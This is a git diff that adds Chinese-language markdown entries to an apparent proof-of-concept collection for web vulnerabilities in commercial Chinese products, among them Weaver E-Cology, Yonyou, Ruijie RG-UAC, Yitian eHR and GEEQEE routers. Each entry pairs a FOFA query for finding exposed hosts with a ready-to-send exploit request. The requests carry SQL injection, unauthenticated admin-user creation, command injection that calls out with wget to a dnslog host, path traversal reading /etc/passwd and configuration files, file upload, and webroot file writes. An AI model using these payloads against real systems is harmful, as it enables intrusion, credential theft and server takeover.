+新视窗新一代物业管理系统的XML Web services接囗GetCertifcatelnfoBvStudentld 实例处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```
+body="BPMSite/ClientSupport/OCXInstall.aspx"
+```
+
+## poc
+
+```
+POST /OfficeManagement/RegisterManager/Report/Training/Report/GetprintData.asmx HTTP/1.1
+Host: your-ip
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetCertificateInfoByStudentId"
+ 
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetCertificateInfoByStudentId xmlns="http://tempuri.org/">
+      <studentId>1;WAITFOR DELAY '0:0:5'--</studentId>
+    </GetCertificateInfoByStudentId>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211840774.png)
\ No newline at end of file
diff --git a/易天智能eHR管理平台任意用户添加漏洞.md b/易天智能eHR管理平台任意用户添加漏洞.md
new file mode 100644
index 0000000..56fb0dd
--- /dev/null
+++ b/易天智能eHR管理平台任意用户添加漏洞.md
@@ -0,0 +1,27 @@
+## 易天智能eHR管理平台任意用户添加漏洞
+
+温州市易天信息科技有限公司主要经营易天人力资源管理软件，是一家致力于人力资源管理软件产品研发的高科技公司。易天智能eHR管理平台任意用户添加漏洞。
+
+## fofa
+
+```
+body="易天智能eHR管理平台"
+```
+
+## poc
+
+```
+GET /BaseManage/UserAPI/CreateUser?Account=stc&Password=123456&OuterID=888 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Connection: close
+Priority: u=1
+```
+
+![image-20240621193645026](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211936086.png)
+
+![image-20240621193657700](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211936732.png)
\ No newline at end of file
diff --git a/极企智能办公路由接口jumper.php存在RCE漏洞.md b/极企智能办公路由接口jumper.php存在RCE漏洞.md
new file mode 100644
index 0000000..17988c7
--- /dev/null
+++ b/极企智能办公路由接口jumper.php存在RCE漏洞.md
@@ -0,0 +1,18 @@
+## 极企智能办公路由接口jumper.php存在RCE漏洞
+
+极企智能办公路由接口jumper.php存在命令执行漏洞，导致服务器权限沦陷。
+
+## fofa
+
+```
+app="GEEQEE-极企智能办公路由"
+```
+
+## poc
+
+```
+GET /notice/jumper.php?t=;wget%20http://xxx.dnslog.cn HTTP/1.1
+Host: 
+Connection: keep-alive
+```
+
diff --git a/极限OA接口video_file.php存在任意文件读取漏洞.md b/极限OA接口video_file.php存在任意文件读取漏洞.md
new file mode 100644
index 0000000..5601205
--- /dev/null
+++ b/极限OA接口video_file.php存在任意文件读取漏洞.md
@@ -0,0 +1,11 @@
+## 极限OA接口video_file.php存在任意文件读取漏洞
+
+极限OA video_file.php 处存在任意文件读取，攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
+
+## poc
+
+```
+/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php 
+```
+
+![image-20240621191009647](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211910698.png)
\ No newline at end of file
diff --git a/泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md b/泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md
new file mode 100644
index 0000000..33fb2e3
--- /dev/null
+++ b/泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md
@@ -0,0 +1,35 @@
+## 泛微E-Cology-KtreeUploadAction任意文件上传漏洞
+
+泛微OA E-Cology KtreeUploadAction 存在文件上传漏洞，攻击者可通过漏洞上传webshell，达到控制web服务器的权限
+
+## fofa
+
+```
+app="泛微-协同商务系统"
+```
+
+## poc
+
+```javascript
+POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Content-Length: 160
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cache-Control: max-age=0
+Connection: close
+Content-Type: multipart/form-data; boundary=--------1638451160
+Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
+Upgrade-Insecure-Requests: 1
+
+----------1638451160
+Content-Disposition: form-data; name="test"; filename="test.txt"
+Content-Type: application/octet-stream
+
+test
+----------1638451160--
+```
+
+![image-20240621190834410](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211908456.png)
\ No newline at end of file
diff --git a/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md b/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md
new file mode 100644
index 0000000..166c6da
--- /dev/null
+++ b/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+## 用友Ufida-ELTextFile.load.d任意文件读取漏洞
+
+用友Ufida /hrss/ELTextFile.load.d 存在任意文件读取漏洞
+
+## fofa
+
+```
+icon_hash="-628229493"
+```
+
+## poc
+
+```
+GET /hrss/ELTextFile.load.d?src=WEB-INF/web.xml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
diff --git a/真内控国产化开发平台接口preview任意文件读取漏洞.md b/真内控国产化开发平台接口preview任意文件读取漏洞.md
new file mode 100644
index 0000000..29645cc
--- /dev/null
+++ b/真内控国产化开发平台接口preview任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+## 真内控国产化开发平台接口preview任意文件读取漏洞
+
+真内控国产化平台 preview接口存在任意文件读取漏洞，未经身份验证的攻击者可以通过构造精心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。导致系统处于极不安全的状态。
+
+## fofa
+
+```
+body="js/npm.echarts.js"
+```
+
+## poc
+
+```
+GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20240621183258115](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211832171.png)
\ No newline at end of file
diff --git a/锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md b/锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md
new file mode 100644
index 0000000..50615dd
--- /dev/null
+++ b/锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md
@@ -0,0 +1,25 @@
+## 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞
+
+锐捷统一上网行为管理与审计RG-UAC系列是星网锐捷网络有限公司自主研发的上网行为管理与审计产品，static_convert.php存在远程命令执行漏洞，导致服务器被控。
+
+## fofa
+
+```
+title="RG-UAC登录页面"
+```
+
+## poc
+
+```
+GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'mht666'%20>>%20/var/www/html/mht.txt%0A HTTP/1.1
+Host:
+Accept: application/json, text/javascript, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+写入`mht.txt`，文件访问`http://127.0.0.1/mht.txt`
+
+![image-20240621192248862](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211922899.png)
\ No newline at end of file